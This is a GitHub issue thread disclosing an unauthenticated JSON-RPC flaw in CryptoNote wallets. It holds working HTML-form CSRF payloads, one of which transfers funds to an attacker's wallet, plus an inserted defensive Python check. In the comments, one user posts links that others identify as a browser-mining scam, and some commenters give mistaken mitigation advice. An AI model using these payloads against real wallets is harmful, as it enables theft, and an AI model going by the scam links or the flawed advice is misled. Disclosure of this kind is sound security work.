cryptonotefoundation / cryptonote

CryptoNote protocol implementation. This is the reference repository for starting a new CryptoNote currency. See /src/cryptonote_config.h
https://cryptonote.org/

Unauthenticated JSON-RPC API allows takeover of CryptoNote RPC wallets #172

Open Ayrx opened 6 years ago

Ayrx commented 6 years ago

The reference implementation of CryptoNote wallets starts a JSON-RPC server listening on a localhost port that allows an attacker to execute wallet functions due to a lack of authentication.

An attacker may exploit this vulnerability to steal cryptocurrency from vulnerable wallets by directing users to visit a webpage hosting the exploit.

Affected Software

All cryptocurrencies that use the reference CryptoNote walletd and simplewallet implementations are vulnerable. Notable coins include Bytecoin and Aeon.

Description

The reference CryptoNote repository comes with two different wallets, simplewallet and walletd. Both wallets have JSON-RPC servers that are vulnerable to similar attacks. Even though the JSON-RPC servers are listening on localhost, they can be exploited via CSRF.

walletd

walletd has the JSON-RPC server enabled by default. The wallet binds to port 8070 by default.

The below proof-of-concept demonstrates the vulnerability by creating a new address in the walletd container.

<html>
<form action=http://127.0.0.1:8070/json_rpc method=post enctype="text/plain" >
    <input name='{"params":{},"jsonrpc":"2.0","method":"createAddress", "ignore_me":"' value='test"}' type='hidden'>
    <input type=submit>
</form>
</html>

simplewallet

simplewallet does not have the JSON-RPC server enabled by default. Enabling the server requires the --rpc-bind-port flag when invoking simplewallet.

The below proof-of-concept demonstrates the vulnerability by making a transfer from the running wallet to an attacker-controlled wallet. Change the INSERT_AMOUNT and INSERT_WALLET_ADDRESS parameters when testing the POC. We assume that simplewallet was invoked with --rpc-bind-port 8111.

<html>
<form action=http://127.0.0.1:8111 method=post enctype="text/plain" >
    <input name='{"jsonrpc":"2.0","method":"transfer","params":{"destinations":[{"amount":INSERT_AMOUNT,"address":"INSERT_WALLET_ADDRESS"}],"fee":100,"mixin":0,"unlock_time":0}, "ignore_me":"' value='test"}' type='hidden'>
    <input type=submit>
</form>
</html>

Notes on exploitation

While the proof-of-concept code assumes that the server is listening on a specific port, changing the running port does prevent exploitation. It is trivial to enumerate open ports with WebSocket.

The proof-of-concept uses an HTML form to demonstrate the attack. However, exploiting this over JavaScript is not an issue due to a lack of CSRF protection.

Recommended Fix

The JSON-RPC servers should be patched to require authentication on every request. It is recommended that all forks of CryptoNote and ByteCoin apply a patch similar to the Turtlecoin fix.
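To make the "Recommended Fix" concrete from the defender's side, the following is an added example (not code from the CryptoNote project or from the report's author) of the request checks a wallet RPC server should perform before dispatching a JSON-RPC method. It builds a constructed request of the shape the text/plain form post above produces (the browser sends `name=value` as the body, which happens to be valid JSON), shows that a server that only parses the body accepts it, and then shows a hardened check that requires a bearer credential, an `application/json` content type, and no browser `Origin`/`Referer` header. The token value, the `build_request` helper and the `authorize_rpc_request` function name are all assumptions made for this example.

```python
import hmac
import json

# Hypothetical shared secret; a real deployment loads it from wallet config, never hard-codes it.
RPC_TOKEN = "constructed-example-token"


def build_request(path: str, headers: dict, body: bytes) -> bytes:
    """Assemble a raw HTTP/1.1 POST so the examples run offline (constructed input)."""
    lines = [f"POST {path} HTTP/1.1", "Host: 127.0.0.1:8070"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def parse_http_request(raw: bytes):
    """Minimal request-line/header/body split; header names are lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def lax_rpc_method(raw: bytes):
    """The behaviour the report describes: parse whatever arrives as JSON-RPC, no other checks."""
    _, _, _, body = parse_http_request(raw)
    return json.loads(body).get("method")


def authorize_rpc_request(raw: bytes, token: str):
    """Hardened gate: returns (True, method) only for an authenticated, non-browser JSON request."""
    method, _, headers, body = parse_http_request(raw)
    if method != "POST":
        return False, "method not allowed"
    # HTML forms can only send text/plain, urlencoded or multipart bodies; JSON-RPC clients send JSON.
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, "unexpected content-type"
    # Browsers attach Origin (and usually Referer) to cross-site POSTs; a local wallet client does not.
    if "origin" in headers or "referer" in headers:
        return False, "browser-originated request rejected"
    # The actual fix from the report: every request must carry a credential, compared in constant time.
    scheme, _, presented = headers.get("authorization", "").partition(" ")
    if scheme != "Bearer" or not hmac.compare_digest(presented.encode(), token.encode()):
        return False, "missing or invalid credential"
    try:
        req = json.loads(body)
    except ValueError:
        return False, "malformed JSON"
    if req.get("jsonrpc") != "2.0" or not isinstance(req.get("method"), str):
        return False, "not a JSON-RPC 2.0 request"
    return True, req["method"]


# Constructed: what the form-based PoC above sends (field name + "=" + value, then CRLF).
FORM_POST = build_request(
    "/json_rpc",
    {"Origin": "http://cross-site.example", "Content-Type": "text/plain"},
    b'{"params":{},"jsonrpc":"2.0","method":"createAddress", "ignore_me":"=test"}\r\n',
)

# Constructed: a legitimate local client call with the expected headers and credential.
LEGIT_POST = build_request(
    "/json_rpc",
    {"Content-Type": "application/json", "Authorization": f"Bearer {RPC_TOKEN}"},
    b'{"jsonrpc":"2.0","id":1,"method":"getBalance","params":{}}',
)

# Constructed: right content type but no credential at all.
NO_AUTH_POST = build_request(
    "/json_rpc",
    {"Content-Type": "application/json"},
    b'{"jsonrpc":"2.0","id":2,"method":"getBalance","params":{}}',
)

if __name__ == "__main__":
    print("lax server dispatches:", lax_rpc_method(FORM_POST))
    for label, req in (("form post", FORM_POST), ("legit", LEGIT_POST), ("no auth", NO_AUTH_POST)):
        print(f"{label}: {authorize_rpc_request(req, RPC_TOKEN)}")
```

The content-type and Origin checks stop the HTML-form variant on their own, but only the credential check closes the door generally (a non-browser client on the same host, or a future browser capability, can set any content type), which is why the report's recommendation is authentication on every request rather than header heuristics.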

SoraKohaku commented 6 years ago

no official anymore we make this grow up. but my team already share cryptonote with original team as copyright. and we next step on Ruby[our codename] to next fixed security issue. See : https://cnhv.co/1lg50 or go our web[https://cnhv.co/dyrf] same as original we keep free they distribute or did change on code. Hope our[cryptonote] family grow~

On Feb 5, 2018 5:10 PM, "Terry Chia" notifications@github.com wrote:

Hi, I found a vulnerability in CryptoNote. Please send me an email at terrycwk1994 [at] gmail.com, as well as respond to this issue so that I know the email is from a legitimate developer.

nnamon commented 6 years ago

For those reading the above, the links are malicious and point to a coinhive miner.

Could at least bother with proper English if they wanted to scam people into browser mining for them.

SoraKohaku commented 6 years ago

actually they pay monero. hmmm just go to nur1labs.net then. im not scammed you just for some little cash lol. or go github mine just click my picture. see DirhamCli we did all good works to new cryptonote evolution tech~

rainmanp7 commented 6 years ago

cnhv <~ doesn't this equate to the Coinhive miner website? Then the after mention is your personal account, to get paid? Does that seem like legitimate help in your mind?

Doestoievski commented 6 years ago

@Ayrx Make a pull request.

SoraKohaku commented 6 years ago

PR can did but that cannot merge. lol i try some~

Ayrx commented 6 years ago

As there has been no response by an official developer in 7 days, I am publishing the details of this vulnerability. A CVE ID has been requested from MITRE and will be updated here when one is assigned. The same report is duplicated at: https://www.ayrx.me/cryptonote-unauthenticated-json-rpc

jared201 commented 6 years ago

@Ayrx no patch needed, just don't bind the RPC daemon to 0.0.0.0, use 127.0.0.1 from your web wallet so no external exploitation is possible. Desktop wallets should be deprecated, they're obsolete. It's really that simple.

Ayrx commented 6 years ago

@jared201 Exploitation is still possible via CSRF even if the daemon is bound only to 127.0.0.1.

jared201 commented 6 years ago

@Ayrx not really, via https, just don't allow unnecessary GET requests coming to your website directly

SoraKohaku commented 6 years ago

used post instead get @_@

keylength commented 6 years ago

The 7 day disclosure window and flaming cryptonote gif are a bit much xD

jared201 commented 6 years ago

@keylength

I guess that JSON-RPC "security" issue is not really new, everyone from Monero to Bytecoin guys already knew that, except that they are silent about it.

SoraKohaku commented 6 years ago

i used json from xdn and they fixed it xD

jared201 commented 6 years ago

@FndNur1Labs this issue is really serious if you're offering desktop wallets which MUST do RPC calls via public IP or FQDN. However if you're developing web wallets, all you need is to "harden" your code by not making RPC calls from the client-side JavaScript, which most browsers will warn about or not allow you to do. Instead, you should use your JS framework's server-side RPC calls (e.g. Meteor.call() or something similar), and those RPC calls should only be connecting locally (127.0.0.1). CSRF'ing is nearly impossible, unless you allow a 'router' to do that.

SoraKohaku commented 6 years ago

@jared like back port example private udp and tcp ones?for js not lack is script not leaked. yes harden code mean improved some code to lack of private ones. i made some experiment about cross-chain will be better or maybe will leaked bot chain. that it. for chain protect not shared key private~used sha or md5[web]
